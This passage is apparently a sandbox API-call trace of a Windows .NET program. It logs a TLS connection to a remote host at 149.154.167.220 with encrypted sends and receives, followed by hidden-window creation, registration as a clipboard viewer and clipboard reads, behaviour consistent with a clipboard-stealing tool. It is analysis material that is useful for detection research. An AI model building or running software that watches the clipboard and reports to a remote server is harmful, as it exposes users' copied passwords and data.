s=0x60c, cmd=-2147195266, argp=0x19f088 | out: argp=0x19f088) returned 0 [0188.412] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x618 [0188.413] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x61c [0188.413] ioctlsocket (in: s=0x618, cmd=-2147195266, argp=0x19f088 | out: argp=0x19f088) returned 0 [0188.413] WSAIoctl (in: s=0x60c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f070, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f070, lpOverlapped=0x0) returned -1 [0188.413] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19eda0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0188.413] WSAEventSelect (s=0x60c, hEventObject=0x614, lNetworkEvents=512) returned 0 [0188.413] WSAIoctl (in: s=0x618, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f070, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f070, lpOverlapped=0x0) returned -1 [0188.413] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19eda0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0188.413] WSAEventSelect (s=0x618, hEventObject=0x61c, lNetworkEvents=512) returned 0 [0188.413] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x19f06c*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x19f06c*=0xa80) returned 0x6f [0188.418] LocalAlloc (uFlags=0x0, uBytes=0xa80) returned 0x5207ff0 [0188.419] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x5207ff0, SizePointer=0x19f06c*=0xa80 | out: AdapterAddresses=0x5207ff0*(Alignment=0x600000178, Length=0x178, IfIndex=0x6, Next=0x52082a0, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0x5208214, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x14, [2]=0xc6, [3]=0x42, [4]=0xf0, [5]=0x9, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x6, ZoneIndices=([0]=0x6, [1]=0x6, [2]=0x6, [3]=0x6, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x5208168*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0x19f06c*=0xa80) returned 0x0 [0188.428] LocalFree (hMem=0x5207ff0) returned 0x0 [0188.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f088 | out: phkResult=0x19f088*=0x620) returned 0x0 [0188.430] RegQueryValueExW (in: hKey=0x620, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x19f0a4, lpData=0x0, lpcbData=0x19f0a0*=0x0 | out: lpType=0x19f0a4*=0x0, lpData=0x0, lpcbData=0x19f0a0*=0x0) returned 0x2 [0188.430] RegCloseKey (hKey=0x620) returned 0x0 [0188.431] WSAConnect (in: s=0x604, name=0x232f568*(sa_family=2, sin_port=0x1bb, sin_addr="149.154.167.220"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0188.456] closesocket (s=0x5dc) returned 0 [0188.484] EnumerateSecurityPackagesW (in: pcPackages=0x19f164, ppPackageInfo=0x19f0f8 | out: pcPackages=0x19f164, ppPackageInfo=0x19f0f8) returned 0x0 [0188.493] FreeContextBuffer (in: pvContextBuffer=0x5d3c30 | out: pvContextBuffer=0x5d3c30) returned 0x0 [0188.498] GetCurrentProcess () returned 0xffffffff [0188.498] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef44 | out: TokenHandle=0x19ef44*=0x620) returned 1 [0188.499] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x23314f0, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x19ef98, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x23329e8, ptsExpiry=0x19ef1c | out: phCredential=0x23329e8, ptsExpiry=0x19ef1c) returned 0x0 [0188.510] InitializeSecurityContextW (in: phCredential=0x19ef5c, phContext=0x0, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x2332b84, pfContextAttr=0x23314c4, ptsExpiry=0x19ef54 | out: phNewContext=0x2332bec, pOutput=0x2332b84, pfContextAttr=0x23314c4, ptsExpiry=0x19ef54) returned 0x90312 [0188.511] FreeContextBuffer (in: pvContextBuffer=0x5206de8 | out: pvContextBuffer=0x5206de8) returned 0x0 [0188.516] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0188.517] GetProcAddress (hModule=0x76720000, lpProcName="AppPolicyGetClrCompat") returned 0x0 [0188.517] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0188.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="GetCurrentPackageId", cchWideChar=19, lpMultiByteStr=0x19ef98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentPackageId", lpUsedDefaultChar=0x0) returned 19 [0188.518] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0188.521] GetCurrentPackageId () returned 0x3d54 [0188.522] send (s=0x604, buf=0x2332c00*, len=180, flags=0) returned 180 [0188.524] recv (in: s=0x604, buf=0x2332c00, len=5, flags=0 | out: buf=0x2332c00*) returned 5 [0188.553] recv (in: s=0x604, buf=0x2332c05, len=69, flags=0 | out: buf=0x2332c05*) returned 69 [0188.554] InitializeSecurityContextW (in: phCredential=0x19eec0, phContext=0x19ef4c, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2333010, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x2333024, pfContextAttr=0x23314c4, ptsExpiry=0x19eeb8 | out: phNewContext=0x2332bec, pOutput=0x2333024, pfContextAttr=0x23314c4, ptsExpiry=0x19eeb8) returned 0x90312 [0188.555] recv (in: s=0x604, buf=0x23330b4, len=5, flags=0 | out: buf=0x23330b4*) returned 5 [0188.555] recv (in: s=0x604, buf=0x23330cd, len=5131, flags=0 | out: buf=0x23330cd*) returned 5131 [0188.555] InitializeSecurityContextW (in: phCredential=0x19ee28, phContext=0x19eeb4, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2334548, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x233455c, pfContextAttr=0x23314c4, ptsExpiry=0x19ee20 | out: phNewContext=0x2332bec, pOutput=0x233455c, pfContextAttr=0x23314c4, ptsExpiry=0x19ee20) returned 0x90312 [0188.557] recv (in: s=0x604, buf=0x23345ec, len=5, flags=0 | out: buf=0x23345ec*) returned 5 [0188.557] recv (in: s=0x604, buf=0x2334605, len=333, flags=0 | out: buf=0x2334605*) returned 333 [0188.558] InitializeSecurityContextW (in: phCredential=0x19ed90, phContext=0x19ee1c, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x23347c4, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x23347d8, pfContextAttr=0x23314c4, ptsExpiry=0x19ed88 | out: phNewContext=0x2332bec, pOutput=0x23347d8, pfContextAttr=0x23314c4, ptsExpiry=0x19ed88) returned 0x90312 [0188.558] recv (in: s=0x604, buf=0x2334868, len=5, flags=0 | out: buf=0x2334868*) returned 5 [0188.558] recv (in: s=0x604, buf=0x2334881, len=4, flags=0 | out: buf=0x2334881*) returned 4 [0188.558] InitializeSecurityContextW (in: phCredential=0x19ecf8, phContext=0x19ed84, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x23348f8, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x233490c, pfContextAttr=0x23314c4, ptsExpiry=0x19ecf0 | out: phNewContext=0x2332bec, pOutput=0x233490c, pfContextAttr=0x23314c4, ptsExpiry=0x19ecf0) returned 0x90312 [0188.574] FreeContextBuffer (in: pvContextBuffer=0x521360 | out: pvContextBuffer=0x521360) returned 0x0 [0188.574] send (s=0x604, buf=0x2334988*, len=126, flags=0) returned 126 [0188.574] recv (in: s=0x604, buf=0x2334988, len=5, flags=0 | out: buf=0x2334988*) returned 5 [0188.592] recv (in: s=0x604, buf=0x2334a2d, len=218, flags=0 | out: buf=0x2334a2d*) returned 218 [0188.592] InitializeSecurityContextW (in: phCredential=0x19ec60, phContext=0x19ecec, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2334b78, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x2334b8c, pfContextAttr=0x23314c4, ptsExpiry=0x19ec58 | out: phNewContext=0x2332bec, pOutput=0x2334b8c, pfContextAttr=0x23314c4, ptsExpiry=0x19ec58) returned 0x90312 [0188.593] recv (in: s=0x604, buf=0x2334c1c, len=5, flags=0 | out: buf=0x2334c1c*) returned 5 [0188.593] recv (in: s=0x604, buf=0x2334c35, len=1, flags=0 | out: buf=0x2334c35*) returned 1 [0188.593] InitializeSecurityContextW (in: phCredential=0x19ebc8, phContext=0x19ec54, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2334ca8, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x2334cbc, pfContextAttr=0x23314c4, ptsExpiry=0x19ebc0 | out: phNewContext=0x2332bec, pOutput=0x2334cbc, pfContextAttr=0x23314c4, ptsExpiry=0x19ebc0) returned 0x90312 [0188.594] recv (in: s=0x604, buf=0x2334d4c, len=5, flags=0 | out: buf=0x2334d4c*) returned 5 [0188.594] recv (in: s=0x604, buf=0x2334d65, len=40, flags=0 | out: buf=0x2334d65*) returned 40 [0188.594] InitializeSecurityContextW (in: phCredential=0x19eb30, phContext=0x19ebbc, pTargetName=0x232f660, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2334e00, Reserved2=0x0, phNewContext=0x2332bec, pOutput=0x2334e14, pfContextAttr=0x23314c4, ptsExpiry=0x19eb28 | out: phNewContext=0x2332bec, pOutput=0x2334e14, pfContextAttr=0x23314c4, ptsExpiry=0x19eb28) returned 0x0 [0188.615] QueryContextAttributesW (in: phContext=0x2332bec, ulAttribute=0x4, pBuffer=0x2334ec0 | out: pBuffer=0x2334ec0) returned 0x0 [0188.616] QueryContextAttributesW (in: phContext=0x2332bec, ulAttribute=0x5a, pBuffer=0x2334f18 | out: pBuffer=0x2334f18) returned 0x0 [0188.617] QueryContextAttributesW (in: phContext=0x2332bec, ulAttribute=0x53, pBuffer=0x23351cc | out: pBuffer=0x23351cc) returned 0x0 [0188.624] CertDuplicateCertificateContext (pCertContext=0x5c4620) returned 0x5c4620 [0188.624] CertDuplicateStore (hCertStore=0x5d0180) returned 0x5d0180 [0188.625] CertEnumCertificatesInStore (hCertStore=0x5d0180, pPrevCertContext=0x0) returned 0x5c45d0 [0188.625] CertDuplicateCertificateContext (pCertContext=0x5c45d0) returned 0x5c45d0 [0188.625] CertEnumCertificatesInStore (hCertStore=0x5d0180, pPrevCertContext=0x5c45d0) returned 0x5c4530 [0188.625] CertDuplicateCertificateContext (pCertContext=0x5c4530) returned 0x5c4530 [0188.625] CertEnumCertificatesInStore (hCertStore=0x5d0180, pPrevCertContext=0x5c4530) returned 0x5c43a0 [0188.626] CertDuplicateCertificateContext (pCertContext=0x5c43a0) returned 0x5c43a0 [0188.626] CertEnumCertificatesInStore (hCertStore=0x5d0180, pPrevCertContext=0x5c43a0) returned 0x5c4620 [0188.626] CertDuplicateCertificateContext (pCertContext=0x5c4620) returned 0x5c4620 [0188.626] CertEnumCertificatesInStore (hCertStore=0x5d0180, pPrevCertContext=0x5c4620) returned 0x0 [0188.626] CertCloseStore (hCertStore=0x5d0180, dwFlags=0x0) returned 1 [0188.626] CertFreeCertificateContext (pCertContext=0x5c4620) returned 1 [0188.637] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x5d04c8 [0188.638] CertAddCRLLinkToStore (in: hCertStore=0x5d04c8, pCrlContext=0x5c45d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0188.638] CertAddCRLLinkToStore (in: hCertStore=0x5d04c8, pCrlContext=0x5c4530, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0188.638] CertAddCRLLinkToStore (in: hCertStore=0x5d04c8, pCrlContext=0x5c43a0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0188.638] CertAddCRLLinkToStore (in: hCertStore=0x5d04c8, pCrlContext=0x5c4620, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0188.640] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x5c4620, pTime=0x19eb3c, hAdditionalStore=0x5d04c8, pChainPara=0x19ea7c, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x19ea70 | out: ppChainContext=0x19ea70) returned 1 [0188.670] CertDuplicateCertificateChain (pChainContext=0x520fe10) returned 0x520fe10 [0188.670] CertDuplicateCertificateContext (pCertContext=0x5c4620) returned 0x5c4620 [0188.670] CertDuplicateCertificateContext (pCertContext=0x5c4260) returned 0x5c4260 [0188.670] CertDuplicateCertificateContext (pCertContext=0x5c4760) returned 0x5c4760 [0188.671] CertDuplicateCertificateContext (pCertContext=0x5c3fe0) returned 0x5c3fe0 [0188.671] CertFreeCertificateChain (pChainContext=0x520fe10) [0188.671] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x520fe10, pPolicyPara=0x19ec1c, pPolicyStatus=0x19ec08 | out: pPolicyStatus=0x19ec08) returned 1 [0188.672] SetLastError (dwErrCode=0x0) [0188.673] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x520fe10, pPolicyPara=0x19ec88, pPolicyStatus=0x19ec30 | out: pPolicyStatus=0x19ec30) returned 1 [0188.678] CertFreeCertificateChain (pChainContext=0x520fe10) [0188.678] CertFreeCertificateContext (pCertContext=0x5c4620) returned 1 [0188.680] CoTaskMemAlloc (cb=0x20c) returned 0x520fe10 [0188.680] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x520fe10, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.680] CoTaskMemFree (pv=0x520fe10) [0188.680] CoTaskMemAlloc (cb=0x20c) returned 0x520fe10 [0188.680] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x520fe10, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.680] CoTaskMemFree (pv=0x520fe10) [0188.680] CoTaskMemAlloc (cb=0x20c) returned 0x520fe10 [0188.680] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x520fe10, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.680] CoTaskMemFree (pv=0x520fe10) [0188.680] CoTaskMemAlloc (cb=0x20c) returned 0x520fe10 [0188.680] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x520fe10, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.680] CoTaskMemFree (pv=0x520fe10) [0188.681] EncryptMessage (in: phContext=0x2332bec, fQOP=0x0, pMessage=0x233d878, MessageSeqNo=0x0 | out: pMessage=0x233d878) returned 0x0 [0188.681] send (s=0x604, buf=0x233c350*, len=289, flags=0) returned 289 [0188.682] select (in: nfds=0, readfds=0x233d91c, writefds=0x0, exceptfds=0x0, timeout=0x19f244*(tv_sec=0, tv_usec=350000) | out: readfds=0x233d91c, writefds=0x0, exceptfds=0x0) returned 1 [0188.702] setsockopt (s=0x604, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0188.702] recv (in: s=0x604, buf=0x2349b80, len=5, flags=0 | out: buf=0x2349b80*) returned 5 [0188.702] recv (in: s=0x604, buf=0x2349b85, len=49, flags=0 | out: buf=0x2349b85*) returned 49 [0188.703] DecryptMessage (in: phContext=0x2332bec, pMessage=0x234dc40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x234dc40, pfQOP=0x0) returned 0x0 [0188.711] EncryptMessage (in: phContext=0x2332bec, fQOP=0x0, pMessage=0x234e424, MessageSeqNo=0x0 | out: pMessage=0x234e424) returned 0x0 [0188.712] CoTaskMemAlloc (cb=0x8) returned 0x5aa998 [0188.712] WSASend (in: s=0x604, lpBuffers=0x5aa998*=((len=0x3a3, buf=0x234dfec*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x19f0c8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0x19f0c8*=0x3a3, lpOverlapped=0x0) returned 0 [0188.713] CoTaskMemFree (pv=0x5aa998) [0188.713] recv (in: s=0x604, buf=0x2349b80, len=5, flags=0 | out: buf=0x2349b80*) returned 5 [0189.120] recv (in: s=0x604, buf=0x2349b85, len=1066, flags=0 | out: buf=0x2349b85*) returned 1066 [0189.120] DecryptMessage (in: phContext=0x2332bec, pMessage=0x234e584, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x234e584, pfQOP=0x0) returned 0x0 [0189.122] setsockopt (s=0x604, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0189.122] SetEvent (hEvent=0x230) returned 1 [0189.266] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x19f400 | out: UnbiasedTime=0x19f400) returned 1 [0189.266] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x19f3f0 | out: UnbiasedTime=0x19f3f0) returned 1 [0189.283] GetModuleHandleW (lpModuleName="user32.dll") returned 0x743d0000 [0189.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x19dbc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWÇf\x8cpÆ=(ú7i¼Þ\x19", lpUsedDefaultChar=0x0) returned 14 [0189.284] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcW") returned 0x7725aee0 [0189.285] GetStockObject (i=5) returned 0x1900015 [0189.287] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0189.289] CoTaskMemAlloc (cb=0x5c) returned 0x5da668 [0189.289] RegisterClassW (lpWndClass=0x19dbb8) returned 0xc264 [0189.289] CoTaskMemFree (pv=0x5da668) [0189.290] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0189.291] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.0.app.0.232467a_r10_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x4037e [0189.343] SetWindowLongW (hWnd=0x4037e, nIndex=-4, dwNewLong=1998958304) returned 74450510 [0189.344] GetWindowLongW (hWnd=0x4037e, nIndex=-4) returned 1998958304 [0189.346] GetCurrentProcess () returned 0xffffffff [0189.346] GetCurrentThread () returned 0xfffffffe [0189.346] GetCurrentProcess () returned 0xffffffff [0189.346] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19d498, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19d498*=0x718) returned 1 [0189.350] GetCurrentThreadId () returned 0x1184 [0189.350] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19d41c | out: phkResult=0x19d41c*=0x71c) returned 0x0 [0189.351] RegQueryValueExW (in: hKey=0x71c, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19d43c, lpData=0x0, lpcbData=0x19d438*=0x0 | out: lpType=0x19d43c*=0x0, lpData=0x0, lpcbData=0x19d438*=0x0) returned 0x2 [0189.351] RegQueryValueExW (in: hKey=0x71c, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19d43c, lpData=0x0, lpcbData=0x19d438*=0x0 | out: lpType=0x19d43c*=0x0, lpData=0x0, lpcbData=0x19d438*=0x0) returned 0x2 [0189.351] RegCloseKey (hKey=0x71c) returned 0x0 [0189.352] SetWindowLongW (hWnd=0x4037e, nIndex=-4, dwNewLong=74450550) returned 1998958304 [0189.352] GetWindowLongW (hWnd=0x4037e, nIndex=-4) returned 74450550 [0189.352] GetWindowLongW (hWnd=0x4037e, nIndex=-16) returned 79691776 [0189.421] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0x24, wParam=0x0, lParam=0x19d734) returned 0x0 [0189.421] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc261 [0189.422] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0x81, wParam=0x0, lParam=0x19d728) returned 0x1 [0189.433] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0x83, wParam=0x0, lParam=0x19d714) returned 0x0 [0189.444] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0x1, wParam=0x0, lParam=0x19d728) returned 0x0 [0189.506] SetClipboardViewer (hWndNewViewer=0x4037e) returned 0x0 [0189.589] OleInitialize (pvReserved=0x0) returned 0x0 [0189.591] OleGetClipboard (in: ppDataObj=0x19f1bc | out: ppDataObj=0x19f1bc*=0x5c8ab8) returned 0x0 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec74 | out: ppvObject=0x19ec74*=0x5c8ab8) returned 0x0 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec30 | out: ppvObject=0x19ec30*=0x0) returned 0x80004002 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea4c | out: ppvObject=0x19ea4c*=0x0) returned 0x80004002 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e824 | out: ppvObject=0x19e824*=0x0) returned 0x80004002 [0189.600] IUnknown:AddRef (This=0x5c8ab8) returned 0x3 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e584 | out: ppvObject=0x19e584*=0x0) returned 0x80004002 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e534 | out: ppvObject=0x19e534*=0x0) returned 0x80004002 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e540 | out: ppvObject=0x19e540*=0x0) returned 0x80004002 [0189.600] CoGetContextToken (in: pToken=0x19e5a0 | out: pToken=0x19e5a0) returned 0x0 [0189.600] CoGetContextToken (in: pToken=0x19e9a8 | out: pToken=0x19e9a8) returned 0x0 [0189.600] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea34 | out: ppvObject=0x19ea34*=0x0) returned 0x80004002 [0189.601] IUnknown:Release (This=0x5c8ab8) returned 0x2 [0189.601] CoGetContextToken (in: pToken=0x19ef88 | out: pToken=0x19ef88) 